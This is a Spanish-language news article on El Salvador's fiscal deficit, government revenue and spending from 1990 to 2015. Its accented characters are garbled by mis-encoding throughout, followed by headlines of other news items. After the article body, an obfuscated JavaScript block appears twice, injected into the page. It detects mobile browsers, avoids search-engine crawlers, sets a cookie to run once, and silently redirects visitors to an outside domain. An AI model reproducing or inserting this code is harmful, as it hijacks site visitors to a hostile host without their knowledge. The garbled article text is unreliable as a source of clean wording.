Noticias

22 Feb 2016
Noticias | Por: Redacción

Impuestos recaudados por GOES mA?s altos que nunca, sin embargo, gobierno asegura que no les alcanza

El dAi??ficit fiscal hasta el A?ltimo quinquenio cumplido del paAi??s fue de -829.6 millones. De esta forma, es la cifra mA?s exorbitante en la historia de El Salvador.Ai??LeAi?? en esta nota cA?mo ha sido el comportamiento de la economAi??a estatal, desde 1990 a 2015 en cuanto a ingresos totales, gastos totales y dAi??ficit fiscal.

Muchos hemos escuchado decir que en los A?ltimos quinquenios el Estado salvadoreAi??o ha realizado gastos exorbitantes, provocando el crecimiento del dAi??ficit fiscal del paAi??s. Lo cierto es que este se elevA? a nA?meros nunca vistos en la historia de El Salvador. Asimismo, muchos han hablado de que la capacidad adquisitiva de los salvadoreAi??os ha disminuido, mientras el costo de la vida ha ido en aumento. A esto se suma el menor crecimiento econA?mico, menores tasas de empleo y menor crecimiento de los salarios.

Pero lo cierto es que, a pesar de que el Estado salvadoreAi??o ha acrecentado sus ingresos a travAi??s de donaciones y la recaudaciA?n tributaria de manera disparada en los A?ltimos aAi??os: a casi 22 mil millones en el A?ltimo quinquenio, al compararlos con los 5 mil 92.3 millones generados por el de Alfredo Cristiani (1990-1994)*; 8 mil 773. 6 millones de dA?lares generados por la administraciA?n de Armando CalderA?n Sol (1995-1999); 11 mil 354. 6 millones ingresados en el gobierno de Francisco Flores (2000-2004); y 16 mil 604.9 millones de dA?lares sumados en la administraciA?n de Antonio Saca (2005-2009).

Sin embargo, a pesar de lo anterior, su gasto tambiAi??n se ha incrementado de modo exorbitante, pasando de 5 mil 691.8 millones hasta 1994, a 26 mil 474.4 millones hasta el 2014, el cual gobernA? Mauricio Funes. Esto quiere decir que el dAi??ficit fiscal del gobierno salvadoreAi??o se duplicA? en su A?ltimo quinquenio cumplido.

En palabras la enciclopedia financiera, se denomina dAi??ficit fiscal al saldo presupuestario del Gobierno cuando este es negativo; es decir, los gastos son superiores a los ingresos, y es el resultado global del presupuesto del sector pA?blico de un paAi??s a lo largo de un perAi??odo contable, generalmente un aAi??o.

En el caso de El Salvador, tal parece que los dirigentes salvadoreAi??os saben muy bien gastar (aunque no necesariamente bien gastados), sobre todo en los A?ltimos aAi??os, pues es notorio el incremento del dAi??ficit fiscal salvadoreAi??o.

Entre el aAi??o 1990 y el 2014, segA?n las estadAi??sticas ofrecidas por la FundaciA?n SalvadoreAi??a para el Desarrollo EconA?mico y Social, por sus siglas FUSADES, el dAi??ficit fiscal en El Salvador finalizA?, en el caso del quinquenio de Alfredo Cristiani en 1994, con 599.5 millones, luego de que sufriera las secuelas de una Guerra Civil de 12 aAi??os; al terminar el quinquenio de CalderA?n Sol en el aAi??o 1999, el dAi??ficit fiscal final fue de un mil 129.9 millones, luego de enfrentarse el paAi??s a uno de los huracanes mA?s intensos jamA?s registrados en el AtlA?ntico: HuracA?n Mitch; el quinquenio de Francisco Flores, terminado hasta el 2004, finalizA? con el dAi??ficit de 2 mil 576.1 millones de dA?lares, justo en el marco de sucedidos dos terremotos de gran magnitud que se dieron en el aAi??o 2001, dejando al paAi??s con millones de pAi??rdidas materiales, asAi?? como la de cientos de vidas humanas. Por otra parte, la administraciA?n gobernada en quinquenio por Antonio Saca, finalizada hasta el 2009, terminA? con un dAi??ficit de 3 mil 307.4 millones; sin embargo, cabe aclarar que durante este perAi??odo los ingresos en el paAi??s se habAi??an triplicado en comparaciA?n con el primer gobierno de ARENA, sumando mA?s de 16 mil millones de dA?lares, en comparaciA?n con los poco mA?s de 5 mil millones generados por Cristiani.GraficaIngresos

Finalmente, los ingresos generados en el paAi??s durante el quinquenio de Mauricio Funes (2009-2014) sumaron 21 mil 948 millones. Sin embargo, a pesar del incremento en ingresos durante su gobierno en plena Crisis EconA?mica, el dAi??ficit fiscal en la naciA?n alcanzA? la cifra mA?s descomunal en la historia democrA?tica de El Salvador, al incrementarse en 4 mil 526.4 millones de dA?lares.

En cuanto al primer aAi??o de gobierno de Salvador SA?nchez CerAi??n en el 2015, obtuvo ingresos totales de 4 mil 921.3 millones de dA?lares, mA?s un gasto total de 5 mil 773 millones, dejando un saldo de dAi??ficit fiscal, en solo un aAi??o, de 851. 7 millones. Esto, si tomamos la comparaciA?n con los ingresos acumulados en el quinquenio total de Francisco Flores, el cual fue de 11 mil 354. 6 millones, significa el doble en ingresos. A pesar de ello, el dinero no alcanza segA?n el gobierno de SA?nchez CerAi??n, lo cual ha posibilitado que lancen nuevos impuestos para la poblaciA?n salvadoreAi??a.

GraficaSinRostros

Algunas consecuencias de incrementar el dAi??ficit fiscal en el paAi??s

De lo anterior se puede deducir que, a pesar de las numerosas reformas tributarias que se han promovido por parte de las diversas administraciones gubernamentales, la situaciA?n de las finanzas pA?blicas no ha tenido ninguna mejora, convirtiAi??ndose asAi?? en uno de los problemas mA?s serios para la estabilidad macroeconA?mica del paAi??s.

Lo antes mencionado ha sido el principal argumento que estA? utilizando actualmente el gobierno de turno, liderado por Salvador SA?nchez CerAi??n del partido Frente Farabundo MartAi?? para la LiberaciA?n Nacional (FMLN), para promover una reforma al sistema actual de pensiones, con el fin de que GOES tambiAi??n pueda administrar el dinero generado por los ahorros de millones de trabajadores salvadoreAi??os. De hecho, el secretario tAi??cnico de la Presidencia, Roberto Lorenzana, sentenciA? que de no aplicarse dicha reforma a la brevedad, la dolarizaciA?n en el paAi??s podrAi??a ser insostenible. ai???Si no se hace (la reforma a las pensiones), lo primero que se puede caer es la dolarizaciA?n (ai??i??), porque eso estA? unido a todo el tema de la capacidad de pago del paAi??sai???, declarA? el funcionario en una entrevista televisiva. En este sentido, si no se corrigen las dificultades de las finanzas pA?blicas salvadoreAi??as, las cuales segA?n el Gobierno son ocasionadas por ai???las obligaciones previsionalesai???, el paAi??s podrAi??a caer en una condiciA?n de impago y propiciarAi??a una desdolarizaciA?n forzada, segA?n los argumentos expuestos por Lorenzana.

Por su parte, Carlos PAi??rez, asesor de la FundaciA?n Nacional para el Desarrollo (Funde), comentA? sobre las declaraciones del secretario presidencial que: ai???En el fondo, ellos saben que eso no resuelve el problema. Desdolarizar no soluciona nada, es mA?s, la emisiA?n de moneda podrAi??a generar altos niveles de inflaciA?nai???, seAi??alA? PAi??rez sobre el tema. De acuerdo al analista, las declaraciones que hizo Lorenzana podrAi??an interpretarse como ai???una amenaza del Gobierno de que si no les aprueban la reforma que van a presentar en la Asamblea, van a desdolarizarai???.

Otra de las consecuencias mA?s directas de los altos dAi??ficit fiscales, en particular durante el A?ltimo quinquenio del paAi??s, es el fuerte incremento en el endeudamiento del paAi??s. Debido principalmente a las limitaciones para financiar estos dAi??ficits con deuda externa, los diferentes gobiernos han tenido que recurrir al financiamiento interno, con lo cual la deuda interna ha pasado factura. Por ejemplo, entre el 1995 y el 2015, segA?n las estadAi??sticas del Banco Central de Reserva (BCR), la deuda pA?blica pasA? de 3 mil 513.2 millones de dA?lares a 16 mil 249.3 millones de dA?lares, hasta septiembre de ese mismo aAi??o.graficadeficit

Lo anterior quiere decir que en las A?ltimas dAi??cadas El Salvador ha aumentado sus deudas en casi un 500 por ciento, siendo los aAi??os 2001, 2002, 2003, 2008, 2009, 2011 y 2012 los perAi??odos que reflejaron un incremento considerable en los saldos finales al 31 de diciembre de cada aAi??o en menciA?n.

Otra de las consecuencias de poseer un alto dAi??ficit fiscal es que este solo puede financiarse de tres formas posibles. Una es el endeudamiento, que como se dijo anteriormente ha incrementado hasta un 500 por ciento hasta el aAi??o 2015. Al respecto, Funde en su informeAi??ai???El Salvador: anA?lisis de sostenibilidad fiscalai??i??, asegurA? que ai???el elevado endeudamiento es nocivo para el progreso social y el crecimiento econA?mico. Desde el 2009, la situaciA?n de la sostenibilidad fiscal se ha visto deteriorada, entre otras razones, por el bajo crecimiento de la economAi??a salvadoreAi??a, el impacto de la crisis internacional que provocA? una caAi??da considerable en los ingresos fiscales que llevA? a financiar el gasto mediante endeudamientoai???, sostuvo la instituciA?n. TambiAi??n reiterA? que algunos paAi??ses, como el caso de El Salvador, al no disponer de riquezas naturales, solo pueden recurrir a impuestos, donaciones y deudas para lograr salir a flote.

La segunda es el aumento de mA?s impuestos. Solo en el aAi??o 2015 una de las decisiones que mA?s crAi??ticas despertA? contra los diputados, y el mismo Ejecutivo, fue la aprobaciA?n de un impuesto del 5 por ciento a las telecomunicaciones, llamado por los legisladores y el mismo presidente como una ai???contribuciA?n especialai??? para la seguridad pA?blica del paAi??s. Este se aprobA? en la sesiA?n plenaria del 29 de octubre de 2015, con 48 votos, sin contar con los de ARENA y de Cristina LA?pez, del PCN. En esa misma sesiA?n plenaria, a propuesta del partido GANA, 45 diputados aprobaron un nuevo impuesto del 5 por ciento a los contribuyentes que reflejen ganancias superiores a los 500 mil dA?lares.

Es relevante mencionar que, segA?n el especialista en finanzas pA?blicas y economista Luis Pazos, si el gobierno incrementa los impuestos, la consecuencia es un menor crecimiento econA?mico, menores tasas de empleo y menor crecimiento de los salarios. ai???Los cambios fiscales recaudatorios pueden aumentar ingresos a corto plazo, pero a mediano y largo plazo inhiben el empleo y el crecimientoai???, afirma Pazos en la revista digital Asuntos Capitales.

Y, finalmente, otra de las consecuencias es la inflaciA?n, pues hasta el 2015 se finalizA? con 1,0 por ciento. Es importante seAi??alar que la inflaciA?n repercute negativamente al paAi??s al elevar las tasas de intereses nominales y reales, genera devaluaciA?n y distorsiona el sistema de precios. Todo esto reduce las tasas de crecimiento econA?mico, la generaciA?n de empleo y el crecimiento de los salarios.GraficaDeficitSinRostros

 

* FUSADES aclarA? que no se poseen datos del aAi??o 1989, en cuanto a ingresos, gastos y dAi??ficit fiscal. Se agradece especialmente a esta fundaciA?n por compartir los datos con los que se basA? esta nota.

 var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

8 Nov 2018
Magistrados del TSE aseguran es imposible hacer fraude en las elecciones presidenciales
Noticias | Por: Redacción

Magistrados del TSE aseguran es imposible hacer fraude en las elecciones presidenciales

28 Oct 2018
Así se renueva el premio hecho cerveza ¡conocé su nueva imagen!
Noticias | Por: Redacción

Así se renueva el premio hecho cerveza ¡conocé su nueva imagen!

18 Oct 2018
Estos son los políticos y empresarios que compraron a la Fiscalía de Luis Martínez. Conocelos
Noticias | Por: Redacción

Estos son los políticos y empresarios que compraron a la Fiscalía de Luis Martínez. Conocelos

15 Oct 2018
Ya inició la carrera por la candidatura presidencial ¿cómo se preparan las elecciones?
Noticias | Por: Redacción

Ya inició la carrera por la candidatura presidencial ¿cómo se preparan las elecciones?